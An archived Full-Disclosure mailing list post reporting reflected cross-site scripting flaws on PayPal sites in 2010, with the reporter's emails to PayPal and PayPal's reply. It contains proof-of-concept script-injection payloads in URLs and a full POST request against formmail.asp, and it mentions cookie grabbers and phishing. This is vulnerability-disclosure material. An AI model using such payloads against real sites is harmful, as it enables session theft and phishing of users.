lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <60352.34611.qm@web24908.mail.ird.yahoo.com>
Date: Fri, 22 Oct 2010 01:39:56 +0100 (BST)
From: Dunno Dunno <infosecspecialist@...oo.co.uk>
To: full-disclosure@...ts.grok.org.uk
Subject: Paypal Vulnerabilities 7/2010

The discovery of multiple Cross Site Vulnerabilities have been idenitifed on 
Paypal's systems, on Friday, the 2/7/2010. 

Multiple vulnerabilities have been disclosed to Paypal, by Leading Security 
Expert  "Lemonais Nicholas of AISecurity" , following a brief telephone 
conversation with the
Paypal security departments. The Paypal team impressed with their  absolute 
cooperation and professionalism, and their policy for encouraging responsible 
and consensus vulnerability disclosure.


From: "ppelce@...pal.co.uk" <ppelce@...pal.co.uk>
To: infosecspecialist@...oo.co.uk
Sent: Thu, 15 July, 2010 10:47:27
Subject: PayPal's Office of Executive Escalations (KMM73645347I96L0KM) :ppk4
15 July 2010

Reference number: 218234

Dear Sirs,
Thank you for your recent email dated 07 July to the offices of PayPal. 
Additionally, I would like to apologise for the delay in responding to your
inquiry regarding your PayPal account.
I would like to thank you for taking the time to contact our Site Security 
team regarding your concerns. I can confirm that they are the correct team 
to work with you on any potential vulnerability that you may have found.
PayPal is a strong believer in responsible disclosure of vulnerabilities to
service providers, and has provided a framework for handling disclosure of 
issues.  Please refer to the PayPal Responsible Disclosure Policy 
documented here: 

https://www.paypal.com/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/Re
portingSecurityIssues-outside
You can also be assured the feedback you have provided in your recent 
correspondence has been taken on board and I can assure you that our 
technical and content teams have been made aware of the concerns raised.
At PayPal we value your feedback. It helps us improve our business and 
serve you better, and we thank you for taking the time to contact us. 
Should you have any further queries on this matter, please feel free to 
email us at ppelce@...pal.co.uk.
Yours sincerely,
Cianan
Executive Escalations
PayPal
Copyright © 1999-2010 PayPal. All rights reserved. PayPal (Europe) S.à r.l.
et Cie, S.C.A. Société en Commandite par Actions. Registered Office: 22-24 
Boulevard Royal, L-2449, Luxembourg, RCS Luxembourg B 118 349

From: Dunno Dunno <infosecspecialist@...oo.co.uk>
To: sitesecurity@...pal.com
Sent: Tue, 6 July, 2010 23:08:49
Subject: Fw: Paypal Web vulnerability in raw source. _recipients variable does 
not validate input and the _requiredFields.

Dear gentlemen,
 
All usual cross site scripts in theory could be applied to variables.
 
Within the paypal enterprise, please do make sure that any 'variable' in either 
Javascript, or Ruby , or any web language the 'input' is sanitised. Therefore , 
in the main xlick , business variable on paypal.com make sure the search string 
is sanitised.
 
Please read below for more details.
 
 
Any help , please do not to call me for more details :)
 
 
Thanks,
 
N.Y 

----- Forwarded Message ----
From: Dunno Dunno <infosecspecialist@...oo.co.uk>
To: sitesecurity@...pal.com;
Sent: Tue, 6 July, 2010 23:03:14
Subject: Paypal Web vulnerability in raw source. _recipients variable does not 
validate input and the _requiredFields.

Dear Sirs,
 
Further to our conversation, here are the details of the 'possible' 
vulnerability on your website. Although i have not carried further investigation 
on the bug, just by leading to the website through gooogle search and viewing 
the source legitimately, the accidental bug could be of great importance, as a 
user could masquerade to perform future phishing attacks, by a fooling a 
legitimately logged user from an other paypal site, within the enterprise..
 
1) https://www.paypal.com/xclick/business=<script> alert("xss"); </script>
 
Possible Vulnerability:
 
https://www.paypal-business.co.uk:443/scripts/formmail.asp 
 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
 <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
 <title>Form Mail</title>
 <style type="text/css">
  body
  {
   background-color: #ffffff;
   color: #000000;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 10pt;
  }
  
  table
  {
   border: solid 1px #000000;
   border-collapse: collapse;
  }
  
  td, th
  {
   border: solid 1px #000000;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 10pt;
   padding: 2px 8px;
  }
  
  th
  {
   background-color: #c0c0c0;
  }
  
  .error
  {
   color: #c00000;
  }
 </style>
</head>
<body>
 <p class="error">
 Form could not be processed due to the following errors:</p>
 <ul>
  <li class="error">No referer.</li>
 
<li class="error">Missing value for 1<script>alert("IS this 
safe?")</script></li> >>> the script does not sanitise input
 </ul>
 <p><a href="#" onclick="history.go(-1); return false;">Back</a></p>
</body> 
</html>

POST https://www.paypal-business.co.uk:443/scripts/formmail.asp HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 
1.1.4322)
Host: www.paypal-business.co.uk
Content-Length: 1517
Cookie: 
ASPSESSIONIDQCQDTCSQ=ALPHGCCCOIAOIKJJOGDLCDBM;ASPSESSIONIDCARASASR=OAMFEECCLCLNKPIHFIHBECEC;s_sess=%20s_cc%3Dtrue%3B

Connection: Close
Pragma: no-cache
_recipients=1<script>alert("IS THIS SAFE AND 
SECURE?")</script>&_subject=Business%20Hub%20Form%3A%20Sign%20up%20for%20Newsgroup&_requiredFields=firstName%2ClastName%2CemailAddress%2CjobTitle&_redirectUrl=https%3A%2F%2Fwww%2Epaypal-business%2Eco%2Euk%2Finformation-for-developers%2Ffrm_thankyou%2Ehtm&firstName=111-222-1933email@...ress.tst&lastName=111-222-1933email@...ress.tst&DisplayedPayPalAccountHolder=yes&DisplayedHasTransactionalSite=yes&DisplayedProductUsed=Website%20Payments%20Pro&DisplayedCorrectLogo=yes&DisplayedLogoOnHomepage=yes&DisplayedLogoOnProduct=yes&DisplayedLogoOnPayment=yes&DisplayedEstimatedSiteLaunch=less%20than%201%20month&DisplayedEcommerceSolution=yes&DisplayedProvider=123%2Ereg&Company=Paypal&Address1=000-123-4933eml@....xxx&Address2=111-222-1933email@...ress.tst&DisplayedCountry=United%20Kingdom&Postcode=111-222-1933email@...ress.tst&CompanyTel=111-222-1933email@...ress.tst&Compa
nyURL=111-222-1933email@...ress.tst&Email=sample%40email%2Etst&estimatedSiteLaunch=%3C%25%3DestimatedSiteLaunch%20%25%3E&country=%3C%25%3Dcountry%20%25%3E&productUsed=%3C%25%3DproductUsed%20%25%3E&paypalAccountHolder=%3C%25%3DpaypalAccountHolder%20%25%3E&hasTransactionalSite=%3C%25%3DhasTransactionalSite%20%25%3E&ecommerceSolution=%3C%25%3DecommerceSolution%20%25%3E&provider=%3C%25%3Dprovider%20%25%3E&correctLogo=%3C%25%3DcorrectLogo%20%25%3E&logoOnHomePage=%3C%25%3DlogoOnHomePage%20%25%3E&logoOnProductPages=%3C%25%3DlogoOnProductPages%20%25%3E&logoOnPaymentPages=%3C%25%3DlogoOnPaymentPages%20%25%3E
E

Full ViewNew vulnerability discovered.
From: Dunno Dunno <infosecspecialist@...oo.co.uk>Add to Contacts 
To: sitesecurity@...pal.com  

--------------------------------------------------------------------------------
Dear Sirs,
 
A vulnerability has been realised accidentally whilst casually browsing the 
website and through a search engine redirection of results to paypal bussiness 
UK. The  report has been made on the 02/07/2010
 
The security issue looks like an XSS scripting attack, whereby an attacker could 
execute an .xss script on the user, or either to redirect to a third party 
website, where an xss backdoor or either an xss cookie grabber could be 
installed. The attack could be further encoded to fool legitimate users of 
PayPal through a phishing attack, or either with the execution of illegal 
scripts on legitimate users. The script could also be potentially used for spam 
emailing, or for further access to other PayPal domains, if controlled.
 
the vulnerability occrus on an ASP form on the paypal UK website. 
 
Affected URL:  
https://www.paypal-business.co.uk:443/scripts/formmail.asp/?_recipients=jONOrbeton%40paypal%2Ecom%2C%20ahicks%40paypal%2Ecom&_subject=Business%20Hub%20Form%3A%20Sign%20up%20for%20Newsgroup&_requiredFields=1<script>alert("is
 this 
safe")</script>&_redirectUrl=https%3A%2F%2Fwww%2Epaypal-business%2Eco%2Euk%2Finformation-for-developers%2Ffrm_thankyou%2Ehtm&firstName=333-342-4533info@...pal.com&lastName=331-123-5674infol@...pal.com&emailAddress=331-542-2463infol@...pal.com&jobTitle=A%20St

 
Please do also note that  an <img src=.../../paypal.gif> onload, or either a 
redirection to a third party website pointing to an xss script could also be 
possible.
 
 
We did try to get in touch with you, although the IT department anounced a 
remedy for this bug. Please, do also let me know if possible to post this 
message to a vulndev according to your public disclaimer for security.
 
The bug is of a similar nature as , 
http://seclists.org/fulldisclosure/2010/Mar/488 

 
Thanks,
 
Nick.


      
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ